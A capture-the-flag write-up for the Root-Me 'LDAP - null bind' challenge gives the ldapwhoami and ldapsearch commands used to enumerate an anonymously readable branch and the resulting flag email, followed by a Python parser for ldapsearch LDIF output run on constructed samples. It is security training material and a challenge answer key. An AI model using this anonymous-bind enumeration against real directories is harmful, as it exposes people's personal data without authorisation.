* LDAP - null bind
** Notes
- https://repository.root-me.org/RFC/EN%20-%20rfc4512.txt
- https://stackoverflow.com/questions/18756688/what-are-cn-ou-dc-in-an-ldap-search
** Task
It seems that one of the Anonymous members has created a new branch in the LDAP directory, somewhere under: dc=challenge01,dc=root-me,dc=org

Gain access to their data and retrieve their email address.

Connection details for the exercise:
- Host: challenge01.root-me.org
- Protocol: TCP
- Port: 54013
** Findings
- Challenge type: LDAP anonymous/null bind enumeration.
- Base DN: dc=challenge01,dc=root-me,dc=org
- Target: find the branch created by an anonymous user and extract their email address.
** Useful tools
- ldapsearch (required)
- ldapwhoami (quick null-bind check)
- openssl s_client (optional, for TLS troubleshooting)
** Recon commands
#+begin_src bash
ldapwhoami -x -H ldap://challenge01.root-me.org:54013
ldapsearch -x -H ldap://challenge01.root-me.org:54013 -b "dc=challenge01,dc=root-me,dc=org" "(objectClass=*)"
ldapsearch -x -H ldap://challenge01.root-me.org:54013 -b "dc=challenge01,dc=root-me,dc=org" "(mail=*)"
#+end_src
** Execution log
- Verified anonymous bind:
  #+begin_src bash
  ldapwhoami -x -H ldap://challenge01.root-me.org:54013
  # anonymous
  #+end_src
- Direct subtree query on the base DN is blocked:
  #+begin_src bash
  ldapsearch -x -H ldap://challenge01.root-me.org:54013 -b "dc=challenge01,dc=root-me,dc=org" "(objectClass=*)"
  # result: 50 Insufficient access
  #+end_src
- Enumerated likely child DNs and found a readable branch:
  #+begin_src bash
  ldapsearch -x -H ldap://challenge01.root-me.org:54013 -b "ou=anonymous,dc=challenge01,dc=root-me,dc=org" -s base "(objectClass=*)" dn
  # dn: ou=anonymous,dc=challenge01,dc=root-me,dc=org
  #+end_src
- Dumped the subtree under the readable branch:
  #+begin_src bash
  ldapsearch -x -H ldap://challenge01.root-me.org:54013 -b "ou=anonymous,dc=challenge01,dc=root-me,dc=org" "(objectClass=*)"
  # dn: uid=sabu,ou=anonymous,dc=challenge01,dc=root-me,dc=org
  # mail: sabu@anonops.org
  #+end_src
** Flag / answer
- Email address: sabu@anonops.org
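** Parsing ldapsearch output
The execution log reads the mail attribute straight off the terminal. When a subtree dump is larger than a couple of entries, or when an attribute comes back base64-encoded (ldapsearch prints it as =attr:: <base64>=) or folded over several lines, it is easier to parse the LDIF output properly and check the =result:= line for access errors. The script below is an added example and is not part of the write-up; it runs on a constructed LDIF sample modelled on the output above (the second user =uid=lulz= and its base64-encoded address are made up to exercise the decoder), and reports the result code so a blocked query such as "50 Insufficient access" is distinguished from an empty but successful one.

```python
import base64

# Constructed sample of ldapsearch LDIF output (not captured from the real server):
# the readable branch from the write-up, plus a folded attribute and a second,
# hypothetical entry whose mail attribute is base64-encoded ("mail::").
B64_MAIL = base64.b64encode(b"lulz@anonops.example").decode()
SAMPLE_LDIF = f"""\
# extended LDIF
#
# LDAPv3
# base <ou=anonymous,dc=challenge01,dc=root-me,dc=org> with scope subtree
# filter: (objectClass=*)
# requesting: ALL
#

# anonymous, challenge01.root-me.org
dn: ou=anonymous,dc=challenge01,dc=root-me,dc=org
objectClass: organizationalUnit
ou: anonymous

# sabu, anonymous, challenge01.root-me.org
dn: uid=sabu,ou=anonymous,dc=challenge01,dc=root-me,dc=org
objectClass: inetOrgPerson
uid: sabu
cn: Sabu
description: a long description that ldapsearch folds
  onto a second line
mail: sabu@anonops.org

# lulz, anonymous, challenge01.root-me.org (constructed)
dn: uid=lulz,ou=anonymous,dc=challenge01,dc=root-me,dc=org
objectClass: inetOrgPerson
uid: lulz
mail:: {B64_MAIL}

# search result
search: 2
result: 0 Success

# numResponses: 4
# numEntries: 3
"""

# Constructed sample of the blocked query against the base DN.
BLOCKED_LDIF = """\
# extended LDIF
#
# LDAPv3
# base <dc=challenge01,dc=root-me,dc=org> with scope subtree
# filter: (objectClass=*)
# requesting: ALL
#

# search result
search: 2
result: 50 Insufficient access

# numResponses: 1
"""


def parse_ldif(text):
    """Parse ldapsearch LDIF output.

    Returns (entries, result): entries is a list of dicts mapping attribute
    name -> list of values (one dict per 'dn:' record); result is the text
    after 'result:' in the trailing search-result record, or None.
    Handles '#' comments, blank-line record separators, folded lines
    (continuation lines start with one space) and base64 values ('attr::').
    """
    # Unfold first: a line starting with a single space continues the previous line.
    unfolded = []
    for raw in text.splitlines():
        if raw.startswith(" ") and unfolded:
            unfolded[-1] += raw[1:]
        else:
            unfolded.append(raw)

    entries, result, current = [], None, {}
    for line in unfolded + [""]:  # sentinel blank line flushes the last record
        if line.startswith("#"):
            continue
        if line == "":
            if "dn" in current:
                entries.append(current)
            elif "result" in current:
                result = current["result"][0]
            current = {}
            continue
        name, sep, rest = line.partition(":")
        if not sep:
            raise ValueError(f"malformed LDIF line: {line!r}")
        if rest.startswith(":"):            # 'attr:: <base64>'
            value = base64.b64decode(rest[1:].strip()).decode("utf-8")
        elif rest.startswith("<"):          # 'attr:< file:///...' - keep the reference, never fetch it
            value = rest[1:].strip()
        else:
            value = rest.strip()
        current.setdefault(name, []).append(value)
    return entries, result


def result_code(result):
    """'50 Insufficient access' -> (50, 'Insufficient access')."""
    code, _, message = result.partition(" ")
    return int(code), message


def mail_addresses(entries):
    """(dn, mail) pairs for every entry that exposes a mail attribute."""
    return [(e["dn"][0], m) for e in entries for m in e.get("mail", [])]


if __name__ == "__main__":
    entries, result = parse_ldif(SAMPLE_LDIF)
    print("result:", result_code(result))
    for dn, mail in mail_addresses(entries):
        print(dn, "->", mail)
    print("blocked query:", result_code(parse_ldif(BLOCKED_LDIF)[1]))
```

In practice the LDIF text comes from =ldapsearch -x -H ldap://host:port -b <base> "(objectClass=*)= piped into the script; the same parser also serves the defender's side of this exercise, auditing which attributes a directory hands to an unauthenticated bind.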